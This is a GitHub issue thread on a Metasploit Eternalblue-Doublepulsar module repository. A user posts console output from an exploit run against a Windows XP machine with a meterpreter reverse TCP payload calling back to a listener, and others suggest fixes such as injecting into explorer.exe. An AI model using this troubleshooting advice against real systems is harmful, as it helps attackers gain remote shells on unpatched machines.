search

Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

Exploit completed, but no session was created. #63

Open BajunQ opened 6 years ago

BajunQ commented 6 years ago

Yeah, maybe I have done something wrong, but all parameters seems to be filled.

[*] Started reverse TCP handler on 192.168.1.36:4444 
[*] IP:445 - Generating Eternalblue XML data
[*] IP:445 - Generating Doublepulsar XML data
[*] IP:445 - Generating payload DLL for Doublepulsar
[*] IP:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] IP:445 - Launching Eternalblue...
[+] IP:445 - Backdoor is already installed
[*] IP:445 - Launching Doublepulsar...
[+] IP:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

Set payload to windows/meterpreter/reverse_tcp, attacking windows xp machine. How can I solve it?

flesh91 commented 6 years ago

You select target windows XP?

BajunQ commented 6 years ago

@flesh91 Yes, I did

flesh91 commented 6 years ago

Try change processinject to explorer.exe

BajunQ commented 6 years ago

@flesh91 also tried this too... Nothing changed.

hfzyz commented 6 years ago

it's doesnt get work because its cant built ip connection,445 is blocked

Eth3rnit3 commented 5 years ago

Its works for me on windows xp SP2 fr version with explorer.exe in PROCESSINJECT